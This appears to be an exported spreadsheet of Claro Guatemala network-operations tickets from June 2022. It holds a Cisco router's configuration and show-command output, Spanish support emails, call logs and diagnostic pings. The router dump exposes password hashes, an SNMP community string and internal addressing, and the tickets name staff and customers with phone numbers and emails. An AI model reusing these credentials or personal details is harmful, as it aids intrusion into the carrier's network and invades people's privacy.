  301F0603 551D2304 18301680 1443A56C 782AEA84 29C5E45F D77B6E29 1078DAD9
  D7301D06 03551D0E 04160414 43A56C78 2AEA8429 C5E45FD7 7B6E2910 78DAD9D7
  300D0609 2A864886 F70D0101 05050003 82010100 8ACEE403 351A64AB 69EFC06A
  B7A0A7B4 C237323C E241AE81 A069600C 8F9E3032 8022E905 56EE669A 3A05E389
  B6FBA026 8C55D895 75702125 88901F63 8751E52A 730AC7F8 8B3EB2D9 C413A2CE
  C9EF20A2 3B74E46F 7C829F07 A17FB2C4 2935B525 97F8BD3E 4ABCA81B A0AE004D
  CD65BF4F 99726573 95490FF1 2CA5437C 7F2EACDA 7D017E63 055B1253 195494BC
  1EDB7B4D 3032FB19 E007F64F 80CE2501 22532A6D F0CEB0F2 EAB8D91D 10D8EA3E
  D0FF8F67 AE05415F 75C1EA09 131BD496 4C7A1491 8FF23AB4 15A125F9 A942B5CF
  98DA7B6F 9A62245D CCDFB545 BE9B1C71 E7FBBB76 3C266C9E 9D33ECCF 2B69EC29
  8AD35112 3F3C3F08 B399056C 30A67D66 303712F8
        QUIT
!
LICENSE UDI PID ISR4221/K9 SN FJC2309A13Z
NO LICENSE SMART ENABLE
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
!
USERNAME GESTIONIP SECRET 5 $1$2L0N$HZGOJJFEVJOHS8F6RMWJM.
!
REDUNDANCY
 MODE NONE
!
!
!
!
CLASS-MAP MATCH-ALL SERVICIOS_12MB
 MATCH ANY
!
POLICY-MAP SERVICIOS_12MB
 CLASS SERVICIOS_12MB
  POLICE CIR 12288000 BC 2304000 BE 4608000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
   VIOLATE-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.170.6 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/340500127T/_/
 BANDWIDTH 12288
 IP ADDRESS 10.105.45.156 255.255.255.192
 IP NAT OUTSIDE
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 12288
 IP ADDRESS 192.168.1.1 255.255.255.0 SECONDARY
 IP ADDRESS 190.148.254.169 255.255.255.252
 IP NAT INSIDE
 NEGOTIATION AUTO
 SERVICE-POLICY INPUT SERVICIOS_12MB
 SERVICE-POLICY OUTPUT SERVICIOS_12MB
!
IP NAT INSIDE SOURCE LIST 1 INTERFACE GIGABITETHERNET0/0/1 OVERLOAD
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.105.45.129 NAME DEFAULT
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 1 PERMIT 192.168.1.0 0.0.0.255
ACCESS-LIST 66 PERMIT 10.0.0.0 0.255.255.255
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_6TA CALLE 12-124 ZONA 1 LOTIFICACION LA FELICIDAD QUETZALTENANGO COATEPEQUE 14.701344 -91.8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BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#    SHO INTE DE
% AMBIGUOUS COMMAND:  "    SHO INTE DE"
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#SHO IP INT BRIE
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.105.45.156   YES NVRAM  UP                    UP
GIGABITETHERNET0/0/1   190.148.254.169 YES NVRAM  UP                    UP
LOOPBACK5              10.212.170.6    YES NVRAM  UP                    UP
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#SHO INTE
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#SHO INTERFACES GIGABITETHERNET0/0/0
GIGABITETHERNET0/0/0 IS UP, LINE PROTOCOL IS UP
  HARDWARE IS ISR4221-2X1GE, ADDRESS IS 00FD.2227.6330 (BIA 00FD.2227.6330)
  DESCRIPTION: WAN PRINCIPAL/_/340500127T/_/
  INTERNET ADDRESS IS 10.105.45.156/26
  MTU 1500 BYTES, BW 12288 KBIT/SEC, DLY 10 USEC,
     RELIABILITY 255/255, TXLOAD 11/255, RXLOAD 224/255
  ENCAPSULATION ARPA, LOOPBACK NOT SET
  KEEPALIVE NOT SUPPORTED
  FULL DUPLEX, 1000MBPS, LINK TYPE IS AUTO, MEDIA TYPE IS RJ45
  OUTPUT FLOW-CONTROL IS OFF, INPUT FLOW-CONTROL IS OFF
  ARP TYPE: ARPA, ARP TIMEOUT 04:00:00
  LAST INPUT 00:00:00, OUTPUT 00:00:00, OUTPUT HANG NEVER
  LAST CLEARING OF "SHOW INTERFACE" COUNTERS NEVER
  INPUT QUEUE: 0/375/0/0 (SIZE/MAX/DROPS/FLUSHES); TOTAL OUTPUT DROPS: 0
  QUEUEING STRATEGY: FIFO
  OUTPUT QUEUE: 0/40 (SIZE/MAX)
  30 SECOND INPUT RATE 10814000 BITS/SEC, 1034 PACKETS/SEC
  30 SECOND OUTPUT RATE 538000 BITS/SEC, 503 PACKETS/SEC
     146739 PACKETS INPUT, 185476098 BYTES, 0 NO BUFFER
     RECEIVED 28 BROADCASTS (0 IP MULTICASTS)
     0 RUNTS, 0 GIANTS, 0 THROTTLES
     0 INPUT ERRORS, 0 CRC, 0 FRAME, 0 OVERRUN, 0 IGNORED
     0 WATCHDOG, 339 MULTICAST, 0 PAUSE INPUT
     55987 PACKETS OUTPUT, 8492461 BYTES, 0 UNDERRUNS
     0 OUTPUT ERRORS, 0 COLLISIONS, 1 INTERFACE RESETS
     211 UNKNOWN PROTOCOL DROPS
     0 BABBLES, 0 LATE COLLISION, 0 DEFERRED
     0 LOST CARRIER, 0 NO CARRIER, 0 PAUSE OUTPUT
     0 OUTPUT BUFFER FAILURES, 0 OUTPUT BUFFERS SWAPPED OUT
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#SH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3619000      1247    642000       646         0
* GIGABITETHERNET0/0/1          0         0         0     27568    256000       235   4451000       438         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#SH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4615000      1332    680000       717         0
* GIGABITETHERNET0/0/1          0         0         0     30701    281000       264   4846000       474         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.105.45.129           4   341E.6B53.1AD8  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.105.45.156           -   00FD.2227.6330  ARPA   GIGABITETHERNET0/0/0
INTERNET  190.148.254.169         -   00FD.2227.6331  ARPA   GIGABITETHERNET0/0/1
INTERNET  190.148.254.170         0   INCOMPLETE      ARPA
INTERNET  192.168.1.1             -   00FD.2227.6331  ARPA   GIGABITETHERNET0/0/1
INTERNET  192.168.1.2             0   B4FB.E4E3.1D8F  ARPA   GIGABITETHERNET0/0/1
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#SH IP INT BRIE
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.105.45.156   YES NVRAM  UP                    UP
GIGABITETHERNET0/0/1   190.148.254.169 YES NVRAM  UP                    UP
LOOPBACK5              10.212.170.6    YES NVRAM  UP                    UP
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#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4694000      1354    641000       737         0
* GIGABITETHERNET0/0/1          0         0         0     33613    291000       282   5092000       497         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#SHO VER
CISCO IOS XE SOFTWARE, VERSION 16.09.02
CISCO IOS SOFTWARE [FUJI], ISR SOFTWARE (X86_64_LINUX_IOSD-UNIVERSALK9_IAS-M), VERSI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BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO UPTIME IS 5 MINUTES
UPTIME FOR THIS CONTROL PROCESSOR IS 7 MINUTES
SYSTEM RETURNED TO ROM BY RELOAD COMMAND
SYSTEM IMAGE FILE IS "BOOTFLASH:ISR4200-UNIVERSALK9_IAS.16.09.02.SPA.BIN"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35000 KBPS
SMART LICENSING STATUS: SMART LICENSING IS DISABLED
CISCO ISR4221/K9 (1RU) PROCESSOR WITH 1784702K/6147K BYTES OF MEMORY.
PROCESSOR BOARD ID FJC2309A13Z
2 GIGABIT ETHERNET INTERFACES
32768K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
4194304K BYTES OF PHYSICAL MEMORY.
7081983K BYTES OF FLASH MEMORY AT BOOTFLASH:.
0K BYTES OF WEBUI ODM FILES AT WEBUI:.
CONFIGURATION REGISTER IS 0X2102
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#SHO IP IN BRIE
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.105.45.156   YES NVRAM  UP                    UP
GIGABITETHERNET0/0/1   190.148.254.169 YES NVRAM  UP                    UP
LOOPBACK5              10.212.170.6    YES NVRAM  UP                    UP
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 5509 BYTES
!
! LAST CONFIGURATION CHANGE AT 21:45:30 UTC SUN JUN 5 2022
!
VERSION 16.9
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$BQPM$79K0MRCNVDO156SL9IYJA1
!
NO AAA NEW-MODEL
!
IP DHCP EXCLUDED-ADDRESS 192.168.1.1
!
IP DHCP POOL CLIENTE
 NETWORK 192.168.1.0 255.255.255.0
 DNS-SERVER 8.8.8.8
 DEFAULT-ROUTER 192.168.1.1
 LEASE 0 2
!
!
!
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-1756368075
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-1756368075
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-1756368075
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-1756368075
 CERTIFICATE SELF-SIGNED 01
  30820330 30820218 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 31373536 33363830 3735301E 170D3139 31303134 31393038
  30335A17 0D333030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D31 37353633
  36383037 35308201 22300D06 092A8648 86F70D01 01010500 0382010F 00308201
  0A028201 0100C7FB F436F8FF F25B0533 1947F15E B5A16D27 9950DDAE D9B0AA1F
  20F39FB0 CE74E2A5 F6224BB8 AD793256 41001A23 9EECC5F2 8A34126D 72E6DB65
  C0F676CA 670E49B9 F9B28DE0 7C31394F 9F5ACE69 59EE58CA 6FE802BB FB614C52
  8269D9CE E583E5AB AB6339E1 0836F5C6 8BE3213E 1EC6EBCF 073A2ED7 32452F6C
  7F2BC878 6E242870 F02FA822 28F46B4E A4696390 4AD0CFDE A41C73C8 714EEBCC
  1CF57D66 FFB95CA0 C0EAC586 219B14B3 C799FC5D 88924FA3 669E07FE 0DCC971C
  09E0BAD3 E5D66545 581EA111 97472F2B 60A2109D D481BFD7 1BABC4FF 183A8DC8
  AEE09B4A 62F2AF75 9DD15579 CD0950B8 01DED161 D87BF311 D038B4FC 405A4B69
  75D4A09D 0F7F0203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF
  301F0603 551D2304 18301680 1443A56C 782AEA84 29C5E45F D77B6E29 1078DAD9
  D7301D06 03551D0E 04160414 43A56C78 2AEA8429 C5E45FD7 7B6E2910 78DAD9D7
  300D0609 2A864886 F70D0101 05050003 82010100 8ACEE403 351A64AB 69EFC06A
  B7A0A7B4 C237323C E241AE81 A069600C 8F9E3032 8022E905 56EE669A 3A05E389
  B6FBA026 8C55D895 75702125 88901F63 8751E52A 730AC7F8 8B3EB2D9 C413A2CE
  C9EF20A2 3B74E46F 7C829F07 A17FB2C4 2935B525 97F8BD3E 4ABCA81B A0AE004D
  CD65BF4F 99726573 95490FF1 2CA5437C 7F2EACDA 7D017E63 055B1253 195494BC
  1EDB7B4D 3032FB19 E007F64F 80CE2501 22532A6D F0CEB0F2 EAB8D91D 10D8EA3E
  D0FF8F67 AE05415F 75C1EA09 131BD496 4C7A1491 8FF23AB4 15A125F9 A942B5CF
  98DA7B6F 9A62245D CCDFB545 BE9B1C71 E7FBBB76 3C266C9E 9D33ECCF 2B69EC29
  8AD35112 3F3C3F08 B399056C 30A67D66 303712F8
        QUIT
!
LICENSE UDI PID ISR4221/K9 SN FJC2309A13Z
NO LICENSE SMART ENABLE
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
!
USERNAME GESTIONIP SECRET 5 $1$2L0N$HZGOJJFEVJOHS8F6RMWJM.
!
REDUNDANCY
 MODE NONE
!
!
!
!
CLASS-MAP MATCH-ALL SERVICIOS_12MB
 MATCH ANY
!
POLICY-MAP SERVICIOS_12MB
 CLASS SERVICIOS_12MB
  POLICE CIR 12288000 BC 2304000 BE 4608000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
   VIOLATE-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.170.6 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/340500127T/_/
 BANDWIDTH 12288
 IP ADDRESS 10.105.45.156 255.255.255.192
 IP NAT OUTSIDE
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 12288
 IP ADDRESS 192.168.1.1 255.255.255.0 SECONDARY
 IP ADDRESS 190.148.254.169 255.255.255.252
 IP NAT INSIDE
 NEGOTIATION AUTO
 SERVICE-POLICY INPUT SERVICIOS_12MB
 SERVICE-POLICY OUTPUT SERVICIOS_12MB
!
IP NAT INSIDE SOURCE LIST 1 INTERFACE GIGABITETHERNET0/0/1 OVERLOAD
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.105.45.129 NAME DEFAULT
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 1 PERMIT 192.168.1.0 0.0.0.255
ACCESS-LIST 66 PERMIT 10.0.0.0 0.255.255.255
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_6TA CALLE 12-124 ZONA 1 LOTIFICACION LA FELICIDAD QUETZALTENANGO COATEPEQUE 14.701344 -91.8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BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#CONF T
ENTER CONFIGURATION COMMANDS, ONE PER LINE.  END WITH CNTL/Z.
CC_BELLUNO_GT_INTERN(CONFIG)#NO IP DOMAIN LOO
CC_BELLUNO_GT_INTERN(CONFIG)#NO IP DOMAIN LOOKUP
CC_BELLUNO_GT_INTERN(CONFIG)#EXIT
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#WR
BUILDING CONFIGURATION...
[OK]
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#</t>
  </si>
  <si>
    <t>F4590846</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 5 DE JUNIO DE 2022 15:06
PARA: JURGEN RENE BOCH CAAL &lt;JURGEN.BOCH@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; RUIZ GARCÍA KARINA &lt;KRUIZ@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4095527 4095665 ::: TICKET CNOC IMCRL004783::: "ENLACE CAIDO"
BUENAS TARDES ESTIMADOS (A)
COMO PARTE DEL SEGUIMIENTO AL CASO 4095527 SOLICITAMOS DE SU AMABLE APOYO PARA PODER OTORGAR ALGÚN CONTACTO EN PUNTO REMOTO, O BIEN DESCARTAR SI YA FUERON REALIZADAS LAS PRUEBAS DE PRIMER NIVEL EN EL SITIO, SE OBSERVA CAÍDA LA INTERFAZ HACIA CLIENTE DESDE LAS 10:00 APROXIMADAMENTE. GRACIAS.</t>
  </si>
  <si>
    <t>F4590847</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE SOLICITANDO CONTACTO DE PUNTO REMOTO PARA REALIZAR PRUEBAS DE PRIMER NIVEL
ASUNTO:  RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4095527 4095665 ::: TICKET CNOC IMCRL004783::: "ENLACE CAIDO"
JURGEN RENE BOCH CAAL
BUENAS TARDES,
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITAMOS SU APOYO CON EL NOMBRE Y NUMERO DE CONTACTO DE CLIENTE EN SUCURSAL, PARA REALIZAR PRUEBAS DE PRIMER NIVEL, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.
JUERGEN BOCH
GESTOR DE CLIENTES CORPORATIVOS N1
NOC CLARO DE CENTROAMÉRICA
JURGEN.BOCH@CLARO.COM.GT
(502)2420-6231
AVENIDA LA CASTELLANA 38-40 ZONA 8, TORRE CLARO.
CIUDAD DE GUATEMALA.
.</t>
  </si>
  <si>
    <t>F4590850</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 5 DE JUNIO DE 2022 14:52
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; RAMOS LERIZTA ILIANA &lt;IRLERIZT@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 1525946OH ::: TICKET CNOC IMGMD005258 ::: "SERVICIO FUERA"
BUENAS TARDES ESTIMADOS(A):
COMO PARTE DEL SEGUIMIENTO AL CASO IMGMD005258  ::: "SERVICIO FUERA" , SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES ANTES PLANTEADOS. SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO LLEGANDO SIN PROBLEMAS A IP WAN DE PUNTO REMOTO Y BGP ESTABLECIDO. GRACIAS DE ANTEMANO. SALUDOS CORDIALES.
FIGURA 1. ENLACE OPERATIVO CON BGP ESTABLECIDO.</t>
  </si>
  <si>
    <t>F4590886</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE RENE SALGUERO A QUIEN SE LE INDICO QUE EL SERVICIO NO PRESENTA INCONVENIENTES.
1001435596
COLA:
NOMBRE: A: 54602855
NÚMERO: 54602855
DURACIÓN: 0:00:24
ESTADO: CONECTADA
DETALLES: 54602855
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 5/06/2022 15:46:53</t>
  </si>
  <si>
    <t>F4590907</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE RAFAEL ESTRADA A QUIEN SE LE INFORMO QUE NO HAY CONEXION CON LA PBX. CLIENTE INDICA QUE EL DIA DE HOY NO TIENE ACCESO A LAS INSTALACIONES PARA REVISAR LA PBX. SOLICITA QUE SE LE LLAME MAÑANA A LAS 8:30AM..
1001438665
COLA:
NOMBRE: A: 47954060
NÚMERO: 011 50247954060
DURACIÓN: 0:00:11
ESTADO: CONECTADA
DETALLES: +50247954060
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 5/06/2022 16:15:27</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RAFAEL ESTRADA 47954060 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001478402</t>
  </si>
  <si>
    <t>F4591035</t>
  </si>
  <si>
    <t>SE PROCEDE A LLAMAR AL CLIENTE ALEX GONZALES QUIEN VA APOYAR A REVISAR LOS EQUIPOS.
1001457340
COLA:
NOMBRE: A: 36595698
NÚMERO: 36595698
DURACIÓN: 0:00:36
ESTADO: CONECTADA
DETALLES: 36595698
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 5/06/2022 20:42:37</t>
  </si>
  <si>
    <t>CLIENTE REALIZA CONFERENCIA CON PERSONAL EN SITIO PARA REALIZAR PRUEBAS, COMPAÑERO EN SITIO ENCUENTRA LOS EQUIPSO AETHRA 6044 Y 2251
INDICA QUE EL 2251 TIENE LA SIGUIENTE ALARMA
L1 - L2 - PARPADEANDO
ETH1 - VERDE
PWR - VERDE
CLIENTE NOS APOYA CON REINICIARLO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ALEX GONZALEZ 36595698 /  31195496 PARA VALIDAR SI YA HAY PERSONAL EN SITIO PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON TEC NERY PARA VALIDAR LOS AVANCES O RESOLUCION DE LA FALLA, CLIENTE CUENTA CON TODAS LAS PROTECCION, SE QUEMO EL PUERTO DE LA REGLETA PANAMAX DONDE ESTA CONECTADO EL E1, TECNICO INDICA QUE  AHORITA ESTA CONECTADO EN UN UPS. SE LE SUGIERE A CLIENTE QUE CAMBIE LA REGLETA.
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEX GONZALEZ 36595698 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001500769
**</t>
  </si>
  <si>
    <t>DESPUES DEL REINICIO SERVICIO NO RESTABLECE, CLIENTE INDICA QUE EL DIA DE AYER TUVIERON TORMENTA ELECTRICA CERCA DE LA ZONA AFECTO A SU SERVICIO DE INTERNET PERO ESE RESTABLECIO PERO EL DE TELEFONIA NO, POSIBLEMENTE LOS EQUIPOS ESTEN DAÑADOS O QUEMADOS, SE ENVIARA PERSOANL TECNICO A VERIFICAR LOS MISMOS, CLIENTE INDICA QUE NO ES NECESARIO TRAMTIAR PERMISOS UNICAMENTE QUE  INGRESE AL AREA DE RECEPCION Y QUE INFORMEN QUE VIENE DE PARTE DE CLARO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4591045</t>
  </si>
  <si>
    <t>SEGUN DISEÑO SE LLEGA CORRECTAMENE AL SW PERO NO SE TIENE ACCESO AL SW DE ACCESO PARA CONTINUAR CON LAS VALIDACIONES SE SOLICITARA CONTACTOS AL CLIENTE PARA REALIZAR PRUEBAS DE 1 ER NIVEL DESCARTANDO ENERGIA Y SGNALIZACION DE COBRE.
&lt;TSANSVZ3N1D1EID1&gt;DIS IP ROUTING-TABLE 10.136.63.216
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : _PUBLIC_
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.136.63.216/32  DIRECT  0    0                 0.0.0.0         VLANIF161
&lt;TSANSVZ3N1D1EID1&gt;DIS CUR INTER VLANIF161
#
INTERFACE VLANIF161
 DESCRIPTION ADMINISTRACION DE SWITCHES
 IP ADDRESS 10.136.63.1 255.255.255.224
 IP ADDRESS 10.136.63.129 255.255.255.128 SUB
#
RETURN
&lt;TSANSVZ3N1D1EID1&gt;TELNET  10.136.63.216
TRYING 10.136.63.216 ...
PRESS CTRL+K TO ABORT
ERROR: FAILED TO CONNECT TO THE REMOTE HOST.
&lt;TSANSVZ3N1D1EID1&gt;</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GUILLERMO CASTILLO 78443874 SOLICITA LLAMADA A LAS 10:30 AM **
-ID 1001485444
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUILLERMO CASTILLO 78443874 / 71532102 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001477482 - 1001477626 - 1001477703</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO. SE PROCEDERA A VALIDAR SI SE CUENTA CON INFORMACION DEL SERVICIO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN INTERNET_ID_ESV 10.142.128.78
  PING 10.142.128.78: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.142.128.78 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.30.52
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_ID_ESV 10.142.128.78
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_ID_ESV
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.142.128.64/26  DIRECT  0    0             D   10.142.128.65   VBDIF2003			</t>
  </si>
  <si>
    <t>F4591075</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL AL CLIENTE NOTIFICANDO LA ALARMA
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: LUNES, 6 DE JUNIO DE 2022 8:2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4860
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM486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1075
ID: 47504180T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM4860
UBICADO EN: CAJERO 4860_KM 70 LOCAL 1, 2 Y 3 MASAGUA ESCUINTLA_SUPER 24 MASAGUA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4591175</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO ENLACE OK NO SE TINEGESTION DE CPE ALARMA TEMIP COMFIRMA QUE SE ENCUENTRA OPERATIVO SE PROCEDE CON CIERRE POR ALARAM DE ENERGIA COMERCIAL SE LE DARA UN TIEMPO DE MONITOREO PARA VALIDAR UQE SE ENCUENTRE OPERATIVO A FINAL DE TURNO . .
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.174.235.39
  PING 10.174.235.39: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.235.39 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.14
